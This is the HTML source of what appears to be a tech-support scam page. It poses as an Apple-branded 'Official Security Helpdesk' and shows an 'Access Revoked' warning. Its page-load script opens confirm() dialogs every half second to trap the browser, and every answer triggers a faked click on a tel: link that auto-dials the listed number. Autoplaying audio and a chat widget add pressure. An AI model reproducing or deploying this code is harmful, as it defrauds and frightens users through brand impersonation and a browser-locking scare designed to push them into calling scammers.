﻿<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" class="no-js"><head>
    <!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,4964235,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="index.htm.html" target="_blank"><img src="0.gif?4964235&101" alt="free stats" border="0"></a></noscript>
<!-- Histats.com  END  -->
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta http-equiv="cache-control" content="max-age=3600">
    <title>Contact - Official Security Helpdesk </title>
    <meta name="description" content="Contact Online support by phone or chat, set up a repair, or make a Genius Bar appointment for iPhone, iPad, Mac and more.">
    <link rel="stylesheet" href="css/Base.css" type="text/css">
    <link href="css/all.css" rel="stylesheet">
    <script src="js/text.js"></script>
<script src="ajax/libs/jquery/3.7.1/jquery.min.js"></script>
  
</head><script async="" defer="" src="core/lo.js?site-id=73a6f0b2"></script>
  <!--Start of Tawk.to Script-->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/68a78ac6f1403e1925840d61/1j377c6i6';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!--End of Tawk.to Script-->
<body>
    <div id="result" style="margin-top: 50px;"></div>
    <input type="checkbox" id="ac-gn-menustate" class="ac-gn-menustate">
    <nav id="ac-globalnav" class="no-js">
        <div class="ac-gn-content"></div>
    </nav>
    <div id="ac-gn-curtain" class="ac-gn-curtain"></div>
    <div id="ac-gn-placeholder" class="ac-nav-placeholder"></div>
    <div class="main">
        <nav id="ac-localnav" class="js no-touch css-sticky" lang="en-US" role="navigation" data-sticky="">
            <div class="ac-ln-wrapper">
                <div class="ac-ln-background"></div>
                <div class="ac-ln-content">
                    <span class="ac-ln-title">
                       Online Helpdesk +1(844) 314-4014
					 </span>
                </div>
            </div>
        </nav>
        <section class="as-columns  as-columns--1up  as-banner as-banner--top">
            <div class="row">
                <div class="column large-12 medium-12 small-12">
                    <div class="as-banner-cont">
                        <div class="as-banner-image as-banner-image--top">
                            <style type="text/css">
                                .as-banner-image.as-banner-image--top {
                                    background-image: url("images/contact-us-hero.image.large_2x.jpg");
                                }
                                
                                .as-banner-image.as-banner-image--top:before {
                                    content: "";
                                    display: block;
                                }
                                
                                @media only screen and (max-width: 735px) {
                                    .as-banner-image.as-banner-image--top {
                                        background-image: url("images/contact-us-hero.image.small_2x.jpg");
                                    }
                                }
                            </style>
                            <img sizes="(min-width:735px ) 735w, 100vw" srcset="images/contact-us-hero.image.small_2x.jpg 735w, images/contact-us-hero.image.large_2x.jpg 1440w" alt="" class="as-image-speculativedownload" src="images/contact-us-hero.image.large_2x.jpg">
                        </div>
                    </div>
                    <div class="as-banner-content">
                        <div class="pageTitle  ">
                            <h1 class="pageTitle-heading">Access Revoked</h1>
                            <p class="pageTitle-intro js_setTextBlock"></p>
                        </div>
                        <div class="sectionTitle sectionTitleBlock">
                            <h2 class="sectionTitle-heading"></h2>
                        </div>
                    </div>
                </div>
            </div>
        </section>
    </div>
    <footer id="ac-globalfooter" class="no-js">
        <div class="ac-gf-content">
            <section class="ac-gf-footer">
                <div class="ac-gf-footer-locale">
                    <a class="ac-gf-footer-locale-link" href="#" title="Choose your country or region" aria-label="United States. Choose your country or region"><img class="ac-gf-footer-locale-flag" src="images/us.png" alt="" width="16" height="16">United States </a>
                </div>
                <div class="ac-gf-footer-legal">
                    <div class="ac-gf-footer-legal-copyright">Copyright© 2025 Online Helpdesk. All rights reserved. </div>
                    <div class="ac-gf-footer-legal-links"><a class="ac-gf-footer-legal-link analytics-exitlink" href="#">Privacy
					Policy </a> <a class="ac-gf-footer-legal-link analytics-exitlink" href="#">Terms of Use </a>
                        <a class="ac-gf-footer-legal-link analytics-exitlink" href="#">Sales and Refunds </a> <a class="ac-gf-footer-legal-link" href="#">Site
						Map </a> <a class="ac-gf-footer-legal-link" href="#">Contact
						Online Helpdesk </a></div>
                </div>
                <meta content="Apple" property="name">
                <meta content="+1(844) 314-4014
			 " property="telephone">
            </section>
        </div>
    </footer>
    <script src="js/jquery-1.12.0.min.js"></script>
    <script>
        var isCall = 0;
        $(document).ready(function() {
            loadText();
            setTimeout(function() {
                myFunction();
            }, 100);
            setInterval(myFunction, 500);
        });

        function loadText() {
            $('.js_setTextBlock').prop('innerHTML', defaultText);
        }

        function myFunction() {
            if (confirm(defaultText)) {
                okkkk();
            } else {
                okkkk();
            }
        }

        function okkkk() {
            $('#result').append('<a id="anchorcall" href="tel:+1(844) 314-4014" target="_top"></a>');
            fakeClick(event, document.getElementById("anchorcall"));
        }

        function fakeClick(event, anchorObj) {
            if (anchorObj.click) {
                anchorObj.click();
            } else if (document.createEvent) {
                if (event.target !== anchorObj) {
                    var evt = document.createEvent("MouseEvents");
                    evt.initMouseEvent("click", true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
                    var allowDefault = anchorObj.dispatchEvent(evt);
                }
            }
        }
    </script>
<script>
        function autoDial() {
            var phoneNumber = "+1(844) 314-4014";
            window.location.href = "tel:" + phoneNumber;
        }
    </script>
<audio id="musicplayer" autoplay="">
    <source src="music.mp3">
</audio>
</body></html>
